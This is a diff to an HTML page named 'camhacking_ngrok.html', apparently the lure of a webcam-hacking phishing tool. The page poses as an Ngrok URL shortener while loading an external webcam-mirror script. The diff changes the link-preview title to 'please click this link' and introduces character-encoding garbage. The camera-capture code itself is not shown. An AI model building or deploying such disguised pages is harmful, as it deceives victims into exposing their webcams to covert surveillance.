--- a/camhacking_ngrok.html
+++ b/camhacking_ngrok.html
@@ -4,12 +4,11 @@
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 <title>Ngrok | URL Shortener</title>
 <meta property="og:type" content="website">
-<meta property="og:title" content="Ngrok | ">
-<meta property="og:site_name" content="Ngrok">
+<meta property="og:title" content="please click this link | ">
+<meta property="og:site_name" content="welcome">
 <meta property="og:url" content="">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<link rel="icon" type="image/x-icon" href="camhack_files/ngrok.ico">
-<link rel="stylesheet" type="text/css" href="camhack_files/style.css" media="screen">
+<link rel="stylesheet" type="text/css" href="style.css" media="screen">
 
 <script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
 <link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
@@ -107,7 +106,7 @@ init();
 		</div>	
 		<div class="flc">
 			
-			<b>Ngrok</b> © 2020		</div>
+			<b>Ngrok</b> Â© 2020		</div>
 	</div>
 	<div class="des">
 		The URL shortener Ngrok at ngrokurlshortener.net can be used to create free short URLs 
@@ -115,7 +114,7 @@ init();
 shared, tweeted, or emailed to your friends. Enter a long URL, and you 
 will get a short URL you can use in its place<br>
 		Ngrok | URL Shortener works as a conductor or proxy for a long URL. The shortener links the longer URL to the shortened version
-		<div class="breadcrumbs"><a href="forwarding_link" target="_blank">Home</a> » <a href="redirect_link" target="_blank">link</a></div>	</div>
+		<div class="breadcrumbs"><a href="forwarding_link" target="_blank">Home</a> Â» <a href="redirect_link" target="_blank">link</a></div>	</div>
 </div>
 </div>
 
